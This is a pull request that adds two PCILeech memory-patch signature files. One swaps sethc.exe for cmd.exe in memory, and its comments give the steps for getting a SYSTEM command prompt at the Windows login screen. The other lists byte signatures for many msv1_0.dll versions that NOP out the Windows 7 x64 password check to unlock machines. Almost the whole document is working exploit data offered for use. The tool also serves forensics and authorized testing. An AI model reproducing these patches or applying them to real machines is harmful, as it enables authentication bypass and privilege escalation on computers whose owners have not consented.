### PR TITLE
Stickykeys->cmd and the missing Win7 unlock signature

### DIFF
--- a/files/stickykeys_cmd_win.sig
+++ b/files/stickykeys_cmd_win.sig
@@ -1,0 +1,15 @@
+# replace sethc.exe with cmd.exe in memory on Windows
+# Signatur for PCILeech version 1.1
+# syntax: see signature_info.txt for more information.
+#
+# Signature by Ian Vitek (Sigtrap)
+#
+# Signature only found after activating sticky keys at least once.
+# (Not 100% reliable to find the signature in memory, but fiddeling around
+#  with sticky keys will in the end leave the sethc.exe in memory.)
+# So, press SHIFT five times to start sethc.exe then patch with this signature.
+# Close the Sticky Key dialog and press SHIFT five times
+#  to get cmd.exe with system access at login.
+#
+# Windows x64 all versions [20160906]
+*,00730065007400680063002E00650078006500200025006C006400000000000000730065007400680063002E006500780065,0,-,r0,0063006D0064002E0065007800650020002000200025006C00640000000000000063006D0064002E00650078006500200020

--- a/files/unlock_win7x64.sig
+++ b/files/unlock_win7x64.sig
@@ -1,0 +1,36 @@
+# unlock signatures for Windows 7 x64 version
+# syntax: see signature_info.txt for more information.
+#
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+2a8,c60f85,2af,b8,2a9,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+2a1,c60f85,2a8,b8,2a2,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+291,c60f85,298,b8,292,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+321,c60f85,328,b8,322,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+e59,c60f85,e60,b8,e5a,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+e71,c60f85,e78,b8,e72,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll unknown (ported from inception)]
+e09,c60f85,e10,b8,e0a,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll 6.1.7601.19160]
+e19,c60f85,e20,b8,e1a,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll 6.1.7601.23452 & 6.1.7601.23455]
+df1,c60f85,df8,b8,df2,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll 6.1.7601.23571]
+e11,c60f85,e18,b8,e02,909090909090
+#
+# signature for Windows 7 x64 [msv1_0.dll 6.1.7601.24408]
+DE5,c60f85,DEC,b8,DE6,909090909090


### PR DESCRIPTION
Added memory patch to replace sethc.exe with cmd.exe.
Also added the missing Windows 7 x64 unlock signature.